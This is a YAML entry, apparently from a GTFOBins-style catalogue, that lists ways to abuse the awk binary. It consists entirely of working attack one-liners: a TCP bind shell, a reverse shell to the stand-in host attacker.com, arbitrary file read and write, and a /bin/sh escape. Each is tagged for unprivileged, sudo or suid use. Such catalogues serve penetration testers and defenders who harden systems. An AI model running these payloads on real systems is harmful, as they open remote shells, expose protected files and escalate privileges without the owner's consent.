---
functions:
  bind-shell:
  - code: |-
      awk 'BEGIN {
          s = "/inet/tcp/12345/0/0";
          while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
          while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
    connector: TCP
    tty: false
  file-read:
  - code: |-
      awk '//' /path/to/input-file
    contexts:
      unprivileged:
      sudo:
      suid:
  file-write:
  - code: |-
      awk 'BEGIN { print "DATA" > /path/to/output-file }'
    contexts:
      unprivileged:
      sudo:
      suid:
  reverse-shell:
  - code: |-
      awk 'BEGIN {
          s = "/inet/tcp/0/attacker.com/12345";
          while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
          while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
    contexts:
      sudo:
      suid:
        shell: true
      unprivileged:
    listener: TCP
    tty: false
  shell:
  - code: |-
      awk 'BEGIN {system("/bin/sh")}'
    contexts:
      sudo:
      suid:
        shell: true
      unprivileged:
...
